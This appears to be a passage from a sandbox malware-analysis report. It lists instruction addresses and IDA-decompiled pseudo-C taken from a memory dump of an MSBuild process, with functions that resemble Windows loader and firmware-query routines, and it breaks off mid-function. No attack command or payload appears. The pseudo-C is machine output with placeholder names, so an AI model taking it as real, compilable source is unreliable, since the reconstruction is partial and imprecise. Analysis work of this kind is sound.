                                                                                                0x0116e7e6
                                                                                                0x0116e7eb
                                                                                                0x0116e7ed
                                                                                                0x0116e7f4
                                                                                                0x0116e7fa
                                                                                                0x0116e7ff
                                                                                                0x0116e7ff
                                                                                                0x0116e80a
                                                                                                0x0116e812
                                                                                                0x0116e812
                                                                                                0x0116e5ab
                                                                                                0x0116e5b4
                                                                                                0x0116e5b9
                                                                                                0x0116e5be
                                                                                                0x0116e5c0
                                                                                                0x0116e5c2
                                                                                                0x0116e5c8
                                                                                                0x0116e5c9
                                                                                                0x0116e5cb
                                                                                                0x0116e5cc
                                                                                                0x0116e5d5
                                                                                                0x0116e5e4
                                                                                                0x0116e5f1
                                                                                                0x0116e5f8
                                                                                                0x0116e5f8
                                                                                                0x0116e5d5
                                                                                                0x0116e602
                                                                                                0x0116e616
                                                                                                0x0116e63d
                                                                                                0x0116e644
                                                                                                0x0116e64d
                                                                                                0x0116e652
                                                                                                0x0116e657
                                                                                                0x0116e659
                                                                                                0x0116e65b
                                                                                                0x0116e661
                                                                                                0x0116e662
                                                                                                0x0116e664
                                                                                                0x0116e665
                                                                                                0x0116e66e
                                                                                                0x0116e67d
                                                                                                0x0116e68a
                                                                                                0x0116e691
                                                                                                0x0116e691
                                                                                                0x0116e66e
                                                                                                0x0116e6b0
                                                                                                0x00000000
                                                                                                0x0116e6b6
                                                                                                0x0116e6bd
                                                                                                0x0116e6c7
                                                                                                0x0116e6d7
                                                                                                0x0116e6d9
                                                                                                0x0116e6db
                                                                                                0x0116e6de
                                                                                                0x0116e6e3
                                                                                                0x0116e6f3
                                                                                                0x0116e6fc
                                                                                                0x0116e700
                                                                                                0x0116e700
                                                                                                0x0116e704
                                                                                                0x0116e70a
                                                                                                0x0116e70a
                                                                                                0x0116e713
                                                                                                0x0116e716
                                                                                                0x0116e719
                                                                                                0x0116e720
                                                                                                0x0116e761
                                                                                                0x0116e76b
                                                                                                0x0116e774
                                                                                                0x0116e77a
                                                                                                0x0116e77a
                                                                                                0x0116e78a
                                                                                                0x0116e791
                                                                                                0x0116e799
                                                                                                0x0116e79b
                                                                                                0x0116e79f
                                                                                                0x0116e7aa
                                                                                                0x0116e7c0
                                                                                                0x0116e7ac
                                                                                                0x0116e7b2
                                                                                                0x0116e7b9
                                                                                                0x0116e7b9
                                                                                                0x0116e7c7
                                                                                                0x0116e806
                                                                                                0x00000000
                                                                                                0x0116e7c9
                                                                                                0x0116e7d1
                                                                                                0x0116e7d8
                                                                                                0x00000000
                                                                                                0x0116e7d8
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0116e722
                                                                                                0x0116e72e
                                                                                                0x0116e748
                                                                                                0x0116e74c
                                                                                                0x0116e754
                                                                                                0x0116e756
                                                                                                0x0116e75c
                                                                                                0x0116e75c
                                                                                                0x00000000
                                                                                                0x0116e75c
                                                                                                0x0116e758
                                                                                                0x0116e758
                                                                                                0x00000000
                                                                                                0x0116e758
                                                                                                0x0116e750
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0116e752
                                                                                                0x00000000
                                                                                                0x0116e752
                                                                                                0x0116e730
                                                                                                0x0116e735
                                                                                                0x0116e73d
                                                                                                0x0116e73f
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0116e741
                                                                                                0x0116e741
                                                                                                0x00000000
                                                                                                0x0116e741
                                                                                                0x0116e739
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0116e73b
                                                                                                0x00000000
                                                                                                0x0116e73b
                                                                                                0x0116e722
                                                                                                0x0116e720
                                                                                                0x0116e6b0
                                                                                                0x0116e618
                                                                                                0x00000000
                                                                                                0x0116e618

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: `$`
                                                                                                • API String ID: 0-197956300
                                                                                                • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                                                                • Instruction ID: 11f3c0f725146669a3bdb77ad25561f8a50cfc7886d8b810be4e3bcffae2b4e3
                                                                                                • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                                                                • Instruction Fuzzy Hash: 7191B5352057429FE728CF29C840B57BBE9BF84714F148A2DF695CB280E776E914CB92
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 011251BE Relevance: 2.7, Strings: 2, Instructions: 173COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 77%
                                                                                                			E011251BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0x11805f0);
				E010FD0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E010BEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E011253CA(0);
						return E010FD130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E010EF3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E010C3690(1, _t117, 0x1081810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E010EAA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L010C4620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E010EAA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E0112500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E010E9860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}






















                                                                                                0x011251be
                                                                                                0x011251c3
                                                                                                0x011251c8
                                                                                                0x011251cd
                                                                                                0x011251d0
                                                                                                0x011251d3
                                                                                                0x011251d8
                                                                                                0x011251db
                                                                                                0x011251de
                                                                                                0x011251e0
                                                                                                0x011251e3
                                                                                                0x011251e6
                                                                                                0x011251e8
                                                                                                0x01125342
                                                                                                0x01125351
                                                                                                0x01125356
                                                                                                0x0112535a
                                                                                                0x01125360
                                                                                                0x01125363
                                                                                                0x01125366
                                                                                                0x01125369
                                                                                                0x01125369
                                                                                                0x0112536b
                                                                                                0x0112536b
                                                                                                0x01125370
                                                                                                0x011253a3
                                                                                                0x011253a4
                                                                                                0x011253a6
                                                                                                0x011253ab
                                                                                                0x011253ab
                                                                                                0x011253ae
                                                                                                0x011253ae
                                                                                                0x011253b5
                                                                                                0x011253bf
                                                                                                0x011253bf
                                                                                                0x01125375
                                                                                                0x01125396
                                                                                                0x011253a0
                                                                                                0x011253a0
                                                                                                0x00000000
                                                                                                0x01125396
                                                                                                0x01125377
                                                                                                0x01125379
                                                                                                0x0112537f
                                                                                                0x0112538c
                                                                                                0x01125390
                                                                                                0x00000000
                                                                                                0x01125390
                                                                                                0x011251ee
                                                                                                0x011251f1
                                                                                                0x01125301
                                                                                                0x01125310
                                                                                                0x01125315
                                                                                                0x01125318
                                                                                                0x0112531b
                                                                                                0x01125320
                                                                                                0x0112532e
                                                                                                0x01125331
                                                                                                0x00000000
                                                                                                0x01125331
                                                                                                0x01125328
                                                                                                0x01125329
                                                                                                0x00000000
                                                                                                0x01125329
                                                                                                0x011251fa
                                                                                                0x01125235
                                                                                                0x01125236
                                                                                                0x01125239
                                                                                                0x0112523f
                                                                                                0x01125240
                                                                                                0x01125241
                                                                                                0x01125242
                                                                                                0x01125246
                                                                                                0x01125247
                                                                                                0x0112524e
                                                                                                0x01125251
                                                                                                0x01125267
                                                                                                0x01125269
                                                                                                0x0112526e
                                                                                                0x0112527d
                                                                                                0x0112527e
                                                                                                0x01125281
                                                                                                0x01125282
                                                                                                0x01125287
                                                                                                0x01125288
                                                                                                0x0112528a
                                                                                                0x0112528f
                                                                                                0x01125294
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0112529a
                                                                                                0x0112529c
                                                                                                0x0112529e
                                                                                                0x0112529e
                                                                                                0x011252a4
                                                                                                0x011252b0
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x011252ba
                                                                                                0x011252bc
                                                                                                0x011252bc
                                                                                                0x011252d4
                                                                                                0x011252d9
                                                                                                0x011252dc
                                                                                                0x011252e1
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x011252e7
                                                                                                0x011252f4
                                                                                                0x00000000
                                                                                                0x011252f4
                                                                                                0x01125270
                                                                                                0x00000000
                                                                                                0x01125270
                                                                                                0x011251fc
                                                                                                0x011251fd
                                                                                                0x01125202
                                                                                                0x01125203
                                                                                                0x01125205
                                                                                                0x0112520a
                                                                                                0x0112520f
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0112521b
                                                                                                0x01125226
                                                                                                0x0112522b
                                                                                                0x0112521d
                                                                                                0x0112521d
                                                                                                0x01125222
                                                                                                0x01125222
                                                                                                0x0112522d
                                                                                                0x00000000

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID: Legacy$UEFI
                                                                                                • API String ID: 2994545307-634100481
                                                                                                • Opcode ID: 37688f5ad20ae68ee66517b091e61055f6099c30095ec38ba4f269c15695453c
                                                                                                • Instruction ID: 028c084db3fd36c9c2576b42328bcd7e59571040af47e51c7325ddaab95865cb
                                                                                                • Opcode Fuzzy Hash: 37688f5ad20ae68ee66517b091e61055f6099c30095ec38ba4f269c15695453c
                                                                                                • Instruction Fuzzy Hash: DE517B71E04619DFDB68DFA8C980AEEBBF9BB48700F14402DE689EB291D7709910CB10
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 010BD5E0 Relevance: 1.9, APIs: 1, Instructions: 353timeCOMMONCrypto
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 87%
                                                                                                			E010BD5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
				signed int _v8;
				intOrPtr _v20;
				signed int _v36;
				intOrPtr* _v40;
				signed int _v44;
				signed int _v48;
				signed char _v52;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr _v120;
				signed int _v132;
				char _v140;
				char _v144;
				char _v157;
				signed int _v164;
				signed int _v168;
				signed int _v169;
				intOrPtr _v176;
				signed int _v180;
				signed int _v184;
				intOrPtr _v188;
				signed int _v192;
				signed int _v200;
				signed int _v208;
				intOrPtr* _v212;
				char _v216;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t204;
				signed int _t206;
				void* _t208;
				signed int _t211;
				signed int _t216;
				intOrPtr _t217;
				intOrPtr* _t218;
				signed int _t226;
				signed int _t239;
				signed int* _t247;
				signed int _t249;
				void* _t252;
				signed int _t256;
				signed int _t269;
				signed int _t271;
				signed int _t277;
				signed int _t279;
				intOrPtr _t283;
				signed int _t287;
				signed int _t288;
				void* _t289;
				signed char _t290;
				signed int _t292;
				signed int* _t293;
				unsigned int _t297;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				intOrPtr _t311;
				intOrPtr _t312;
				signed int _t319;
				signed int _t320;
				signed int* _t324;
				signed int _t337;
				signed int _t338;
				signed int _t339;
				signed int* _t340;
				void* _t341;
				signed int _t344;
				signed int _t348;
				signed int _t349;
				signed int _t351;
				intOrPtr _t353;
				void* _t354;
				signed int _t356;
				signed int _t358;
				intOrPtr _t359;
				signed int _t361;
				signed int _t363;
				signed short* _t365;
				void* _t367;
				intOrPtr _t369;
				void* _t370;
				signed int _t371;
				signed int _t372;
				void* _t374;
				signed int _t376;
				void* _t384;
				signed int _t387;

				_v8 =  *0x119d360 ^ _t376;
				_t2 =  &_a20;
				 *_t2 = _a20 & 0x00000001;
				_t287 = _a4;
				_v200 = _a12;
				_t365 = _a8;
				_v212 = _a16;
				_v180 = _a24;
				_v168 = 0;
				_v157 = 0;
				if( *_t2 != 0) {
					__eflags = E010B6600(0x11952d8);
					if(__eflags == 0) {
						goto L1;
					} else {
						_v188 = 6;
					}
				} else {
					L1:
					_v188 = 9;
				}
				if(_t365 == 0) {
					_v164 = 0;
					goto L5;
				} else {
					_t363 =  *_t365 & 0x0000ffff;
					_t341 = _t363 + 1;
					if((_t365[1] & 0x0000ffff) < _t341) {
						L109:
						__eflags = _t341 - 0x80;
						if(_t341 <= 0x80) {
							_t281 =  &_v140;
							_v164 =  &_v140;
							goto L114;
						} else {
							_t283 =  *0x1197b9c; // 0x0
							_t281 = L010C4620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
							_v164 = _t281;
							__eflags = _t281;
							if(_t281 != 0) {
								_v157 = 1;
								L114:
								E010EF3E0(_t281, _t365[2], _t363);
								_t200 = _v164;
								 *((char*)(_v164 + _t363)) = 0;
								goto L5;
							} else {
								_t204 = 0xc000009a;
								goto L47;
							}
						}
					} else {
						_t200 = _t365[2];
						_v164 = _t200;
						if( *((char*)(_t200 + _t363)) != 0) {
							goto L109;
						} else {
							while(1) {
								L5:
								_t353 = 0;
								_t342 = 0x1000;
								_v176 = 0;
								if(_t287 == 0) {
									break;
								}
								_t384 = _t287 -  *0x1197b90; // 0x77d00000
								if(_t384 == 0) {
									_t353 =  *0x1197b8c; // 0xc52ae8
									_v176 = _t353;
									_t320 = ( *(_t353 + 0x50))[8];
									_v184 = _t320;
								} else {
									E010C2280(_t200, 0x11984d8);
									_t277 =  *0x11985f4; // 0xc52fd8
									_t351 =  *0x11985f8 & 1;
									while(_t277 != 0) {
										_t337 =  *(_t277 - 0x50);
										if(_t337 > _t287) {
											_t338 = _t337 | 0xffffffff;
										} else {
											asm("sbb ecx, ecx");
											_t338 =  ~_t337;
										}
										_t387 = _t338;
										if(_t387 < 0) {
											_t339 =  *_t277;
											__eflags = _t351;
											if(_t351 != 0) {
												__eflags = _t339;
												if(_t339 == 0) {
													goto L16;
												} else {
													goto L118;
												}
												goto L151;
											} else {
												goto L16;
											}
											goto L17;
										} else {
											if(_t387 <= 0) {
												__eflags = _t277;
												if(_t277 != 0) {
													_t340 =  *(_t277 - 0x18);
													_t24 = _t277 - 0x68; // 0xc52f70
													_t353 = _t24;
													_v176 = _t353;
													__eflags = _t340[3] - 0xffffffff;
													if(_t340[3] != 0xffffffff) {
														_t279 =  *_t340;
														__eflags =  *(_t279 - 0x20) & 0x00000020;
														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
															asm("lock inc dword [edi+0x9c]");
															_t340 =  *(_t353 + 0x50);
														}
													}
													_v184 = _t340[8];
												}
											} else {
												_t339 =  *(_t277 + 4);
												if(_t351 != 0) {
													__eflags = _t339;
													if(_t339 == 0) {
														goto L16;
													} else {
														L118:
														_t277 = _t277 ^ _t339;
														goto L17;
													}
													goto L151;
												} else {
													L16:
													_t277 = _t339;
												}
												goto L17;
											}
										}
										goto L25;
										L17:
									}
									L25:
									E010BFFB0(_t287, _t353, 0x11984d8);
									_t320 = _v184;
									_t342 = 0x1000;
								}
								if(_t353 == 0) {
									break;
								} else {
									_t366 = 0;
									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
										_t288 = _v164;
										if(_t353 != 0) {
											_t342 = _t288;
											_t374 = E010FCC99(_t353, _t288, _v200, 1,  &_v168);
											if(_t374 >= 0) {
												if(_v184 == 7) {
													__eflags = _a20;
													if(__eflags == 0) {
														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
														if(__eflags != 0) {
															_t271 = E010B6600(0x11952d8);
															__eflags = _t271;
															if(__eflags == 0) {
																_t342 = 0;
																_v169 = _t271;
																_t374 = E010B7926( *(_t353 + 0x50), 0,  &_v169);
															}
														}
													}
												}
												if(_t374 < 0) {
													_v168 = 0;
												} else {
													if( *0x119b239 != 0) {
														_t342 =  *(_t353 + 0x18);
														E0112E974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
													}
													if( *0x1198472 != 0) {
														_v192 = 0;
														_t342 =  *0x7ffe0330;
														_t361 =  *0x119b218; // 0x0
														asm("ror edi, cl");
														 *0x119b1e0( &_v192, _t353, _v168, 0, _v180);
														 *(_t361 ^  *0x7ffe0330)();
														_t269 = _v192;
														_t353 = _v176;
														__eflags = _t269;
														if(__eflags != 0) {
															_v168 = _t269;
														}
													}
												}
											}
											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
												_t366 = 0xc000007a;
											}
											_t247 =  *(_t353 + 0x50);
											if(_t247[3] == 0xffffffff) {
												L40:
												if(_t366 == 0xc000007a) {
													__eflags = _t288;
													if(_t288 == 0) {
														goto L136;
													} else {
														_t366 = 0xc0000139;
													}
													goto L54;
												}
											} else {
												_t249 =  *_t247;
												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
													goto L40;
												} else {
													_t250 = _t249 | 0xffffffff;
													asm("lock xadd [edi+0x9c], eax");
													if((_t249 | 0xffffffff) == 0) {
														E010C2280(_t250, 0x11984d8);
														_t342 =  *(_t353 + 0x54);
														_t165 = _t353 + 0x54; // 0x54
														_t252 = _t165;
														__eflags =  *(_t342 + 4) - _t252;
														if( *(_t342 + 4) != _t252) {
															L135:
															asm("int 0x29");
															L136:
															_t288 = _v200;
															_t366 = 0xc0000138;
															L54:
															_t342 = _t288;
															L010E3898(0, _t288, _t366);
														} else {
															_t324 =  *(_t252 + 4);
															__eflags =  *_t324 - _t252;
															if( *_t324 != _t252) {
																goto L135;
															} else {
																 *_t324 = _t342;
																 *(_t342 + 4) = _t324;
																_t293 =  *(_t353 + 0x50);
																_v180 =  *_t293;
																E010BFFB0(_t293, _t353, 0x11984d8);
																__eflags =  *((short*)(_t353 + 0x3a));
																if( *((short*)(_t353 + 0x3a)) != 0) {
																	_t342 = 0;
																	__eflags = 0;
																	E010E37F5(_t353, 0);
																}
																E010E0413(_t353);
																_t256 =  *(_t353 + 0x48);
																__eflags = _t256;
																if(_t256 != 0) {
																	__eflags = _t256 - 0xffffffff;
																	if(_t256 != 0xffffffff) {
																		E010D9B10(_t256);
																	}
																}
																__eflags =  *(_t353 + 0x28);
																if( *(_t353 + 0x28) != 0) {
																	_t174 = _t353 + 0x24; // 0x24
																	E010D02D6(_t174);
																}
																L010C77F0( *0x1197b98, 0, _t353);
																__eflags = _v180 - _t293;
																if(__eflags == 0) {
																	E010DC277(_t293, _t366);
																}
																_t288 = _v164;
																goto L40;
															}
														}
													} else {
														goto L40;
													}
												}
											}
										}
									} else {
										L010BEC7F(_t353);
										L010D19B8(_t287, 0, _t353, 0);
										_t200 = E010AF4E3(__eflags);
										continue;
									}
								}
								L41:
								if(_v157 != 0) {
									L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
								}
								if(_t366 < 0) {
									L46:
									 *_v212 = _v168;
									_t204 = _t366;
									L47:
									_pop(_t354);
									_pop(_t367);
									_pop(_t289);
									return E010EB640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
								} else {
									_t206 =  *0x119b2f8; // 0x0
									if((_t206 |  *0x119b2fc) == 0 || ( *0x119b2e4 & 0x00000001) != 0) {
										goto L46;
									} else {
										_t297 =  *0x119b2ec; // 0x0
										_v200 = 0;
										if((_t297 >> 0x00000008 & 0x00000003) == 3) {
											_t355 = _v168;
											_t342 =  &_v208;
											_t208 = E01156B68(_v168,  &_v208, _v168, __eflags);
											__eflags = _t208 - 1;
											if(_t208 == 1) {
												goto L46;
											} else {
												__eflags = _v208 & 0x00000010;
												if((_v208 & 0x00000010) == 0) {
													goto L46;
												} else {
													_t342 = 4;
													_t366 = E01156AEB(_t355, 4,  &_v216);
													__eflags = _t366;
													if(_t366 >= 0) {
														goto L46;
													} else {
														asm("int 0x29");
														_t356 = 0;
														_v44 = 0;
														_t290 = _v52;
														__eflags = 0;
														if(0 == 0) {
															L108:
															_t356 = 0;
															_v44 = 0;
															goto L63;
														} else {
															__eflags = 0;
															if(0 < 0) {
																goto L108;
															}
															L63:
															_v112 = _t356;
															__eflags = _t356;
															if(_t356 == 0) {
																L143:
																_v8 = 0xfffffffe;
																_t211 = 0xc0000089;
															} else {
																_v36 = 0;
																_v60 = 0;
																_v48 = 0;
																_v68 = 0;
																_v44 = _t290 & 0xfffffffc;
																E010BE9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
																_t306 = _v68;
																__eflags = _t306;
																if(_t306 == 0) {
																	_t216 = 0xc000007b;
																	_v36 = 0xc000007b;
																	_t307 = _v60;
																} else {
																	__eflags = _t290 & 0x00000001;
																	if(__eflags == 0) {
																		_t349 =  *(_t306 + 0x18) & 0x0000ffff;
																		__eflags = _t349 - 0x10b;
																		if(_t349 != 0x10b) {
																			__eflags = _t349 - 0x20b;
																			if(_t349 == 0x20b) {
																				goto L102;
																			} else {
																				_t307 = 0;
																				_v48 = 0;
																				_t216 = 0xc000007b;
																				_v36 = 0xc000007b;
																				goto L71;
																			}
																		} else {
																			L102:
																			_t307 =  *(_t306 + 0x50);
																			goto L69;
																		}
																		goto L151;
																	} else {
																		_t239 = L010BEAEA(_t290, _t290, _t356, _t366, __eflags);
																		_t307 = _t239;
																		_v60 = _t307;
																		_v48 = _t307;
																		__eflags = _t307;
																		if(_t307 != 0) {
																			L70:
																			_t216 = _v36;
																		} else {
																			_push(_t239);
																			_push(0x14);
																			_push( &_v144);
																			_push(3);
																			_push(_v44);
																			_push(0xffffffff);
																			_t319 = E010E9730();
																			_v36 = _t319;
																			__eflags = _t319;
																			if(_t319 < 0) {
																				_t216 = 0xc000001f;
																				_v36 = 0xc000001f;
																				_t307 = _v60;
																			} else {
																				_t307 = _v132;
																				L69:
																				_v48 = _t307;
																				goto L70;
																			}
																		}
																	}
																}
																L71:
																_v72 = _t307;
																_v84 = _t216;
																__eflags = _t216 - 0xc000007b;
																if(_t216 == 0xc000007b) {
																	L150:
																	_v8 = 0xfffffffe;
																	_t211 = 0xc000007b;
																} else {
																	_t344 = _t290 & 0xfffffffc;
																	_v76 = _t344;
																	__eflags = _v40 - _t344;
																	if(_v40 <= _t344) {
																		goto L150;
																	} else {
																		__eflags = _t307;
																		if(_t307 == 0) {
																			L75:
																			_t217 = 0;
																			_v104 = 0;
																			__eflags = _t366;
																			if(_t366 != 0) {
																				__eflags = _t290 & 0x00000001;
																				if((_t290 & 0x00000001) != 0) {
																					_t217 = 1;
																					_v104 = 1;
																				}
																				_t290 = _v44;
																				_v52 = _t290;
																			}
																			__eflags = _t217 - 1;
																			if(_t217 != 1) {
																				_t369 = 0;
																				_t218 = _v40;
																				goto L91;
																			} else {
																				_v64 = 0;
																				E010BE9C0(1, _t290, 0, 0,  &_v64);
																				_t309 = _v64;
																				_v108 = _t309;
																				__eflags = _t309;
																				if(_t309 == 0) {
																					goto L143;
																				} else {
																					_t226 =  *(_t309 + 0x18) & 0x0000ffff;
																					__eflags = _t226 - 0x10b;
																					if(_t226 != 0x10b) {
																						__eflags = _t226 - 0x20b;
																						if(_t226 != 0x20b) {
																							goto L143;
																						} else {
																							_t371 =  *(_t309 + 0x98);
																							goto L83;
																						}
																					} else {
																						_t371 =  *(_t309 + 0x88);
																						L83:
																						__eflags = _t371;
																						if(_t371 != 0) {
																							_v80 = _t371 - _t356 + _t290;
																							_t310 = _v64;
																							_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
																							_t292 =  *(_t310 + 6) & 0x0000ffff;
																							_t311 = 0;
																							__eflags = 0;
																							while(1) {
																								_v120 = _t311;
																								_v116 = _t348;
																								__eflags = _t311 - _t292;
																								if(_t311 >= _t292) {
																									goto L143;
																								}
																								_t359 =  *((intOrPtr*)(_t348 + 0xc));
																								__eflags = _t371 - _t359;
																								if(_t371 < _t359) {
																									L98:
																									_t348 = _t348 + 0x28;
																									_t311 = _t311 + 1;
																									continue;
																								} else {
																									__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
																									if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
																										goto L98;
																									} else {
																										__eflags = _t348;
																										if(_t348 == 0) {
																											goto L143;
																										} else {
																											_t218 = _v40;
																											_t312 =  *_t218;
																											__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
																											if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
																												_v100 = _t359;
																												_t360 = _v108;
																												_t372 = L010B8F44(_v108, _t312);
																												__eflags = _t372;
																												if(_t372 == 0) {
																													goto L143;
																												} else {
																													_t290 = _v52;
																													_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E010E3C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
																													_t307 = _v72;
																													_t344 = _v76;
																													_t218 = _v40;
